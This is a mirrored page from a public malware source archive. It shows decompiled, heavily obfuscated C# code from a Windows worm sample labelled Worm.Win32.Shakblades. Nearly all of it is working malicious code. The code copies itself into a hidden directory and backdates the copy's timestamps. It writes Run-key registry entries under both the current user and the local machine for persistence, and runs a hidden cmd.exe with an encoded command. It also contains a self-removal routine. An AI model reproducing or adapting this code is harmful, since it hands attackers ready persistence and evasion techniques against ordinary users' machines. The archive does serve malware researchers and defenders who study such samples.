mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 21:35:27 +00:00
194 lines
6.9 KiB
C#
194 lines
6.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.ɱªᕢ᳭ᬻ˫ԧᵢ
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
internal class ɱªᕢ᳭ᬻ\u02EBԧᵢ
|
|||
|
{
|
|||
|
public static void ᅰ()
|
|||
|
{
|
|||
|
ɱªᕢ᳭ᬻ\u02EBԧᵢ.P();
|
|||
|
ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᯁព();
|
|||
|
ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᶏපϔẞ();
|
|||
|
}
|
|||
|
|
|||
|
private static void P()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (!Directory.Exists(ȩזြڹᡡỾỔው.ౡ\u000F))
|
|||
|
Directory.CreateDirectory(ȩזြڹᡡỾỔው.ౡ\u000F);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), true);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
if (ȩזြڹᡡỾỔው.\u09C7)
|
|||
|
{
|
|||
|
Random random = new Random();
|
|||
|
int day = random.Next(1, 28);
|
|||
|
int month = random.Next(1, 12);
|
|||
|
int year = random.Next(2000, DateTime.Now.Year);
|
|||
|
Directory.SetCreationTime(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), new DateTime(year, month, day));
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
if (ȩזြڹᡡỾỔው.όᘂ\u1CCCᥓ\u005B)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
File.SetAttributes(ȩזြڹᡡỾỔው.ౡ\u000F, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
if (!ȩזြڹᡡỾỔው.\u0B6E೮ᔙᩢ᷵ጔổ)
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
File.SetAttributes(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.յ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void ᶏපϔẞ()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (ȩזြڹᡡỾỔው.\u1C42\u193Eᙁᖔᠮ೬\u1BFB)
|
|||
|
Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
if (ȩזြڹᡡỾỔው.கພ༢ਊȷඣᯇᝨ)
|
|||
|
Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
if (!ȩזြڹᡡỾỔው.ԑᅤᴨᡰ\u02EFᣢỳ)
|
|||
|
return;
|
|||
|
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
|
|||
|
subKey.SetValue("Fjc4JcO+nOsTJDcr", (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
subKey.SetValue("BjAGKzC99eEAMR4pKSIh", (object) 1, RegistryValueKind.DWord);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static void ᯁព()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Process process = new Process();
|
|||
|
process.StartInfo = new ProcessStartInfo()
|
|||
|
{
|
|||
|
FileName = "cmd.exe",
|
|||
|
UseShellExecute = false,
|
|||
|
RedirectStandardInput = true,
|
|||
|
CreateNoWindow = true,
|
|||
|
WindowStyle = ProcessWindowStyle.Hidden
|
|||
|
};
|
|||
|
process.Start();
|
|||
|
StreamWriter standardInput = process.StandardInput;
|
|||
|
standardInput.WriteLine("cd " + ȩזြڹᡡỾỔው.ౡ\u000F);
|
|||
|
standardInput.WriteLine(string.Format(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("KCYrMuMePTIxKBc1JDE2KSg1IB0yMSgMB8O+nOvjAOP14wHjPvNA/R0SEQjxLCcoMTcsKSwoNQ==", true), (object) \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
|||
|
standardInput.Close();
|
|||
|
process.Kill();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void \u171D\u0018ẖေᒷᐦᵨỨ()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u02DBˬଋธ, true));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.DeleteSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
switch (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ)
|
|||
|
{
|
|||
|
case RegistryHive.CurrentUser:
|
|||
|
Registry.CurrentUser.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
|
|||
|
break;
|
|||
|
case RegistryHive.LocalMachine:
|
|||
|
Registry.LocalMachine.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
ɱªᕢ᳭ᬻ\u02EBԧᵢ.\u0AFD();
|
|||
|
}
|
|||
|
|
|||
|
public static void \u0AFD()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string tempFileName = Path.GetTempFileName();
|
|||
|
File.Delete(tempFileName);
|
|||
|
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
|
|||
|
\u0667Ѹ.\u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(tempFileName, (string) null, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ.ᑹ\u17FCנᒞ͍ሴǒ);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public enum \u0EF7ᶟᔂᢪĉᤘᢁַắ
|
|||
|
{
|
|||
|
የ᠖\u0E6Cᬰᥥ,
|
|||
|
ฏᆈǸ᱙Ȏ\u1CFD༾,
|
|||
|
\u05AFᩚၡ\u00F7ᩯ\u1B4Cጝ,
|
|||
|
}
|
|||
|
}
|
|||
|
}
|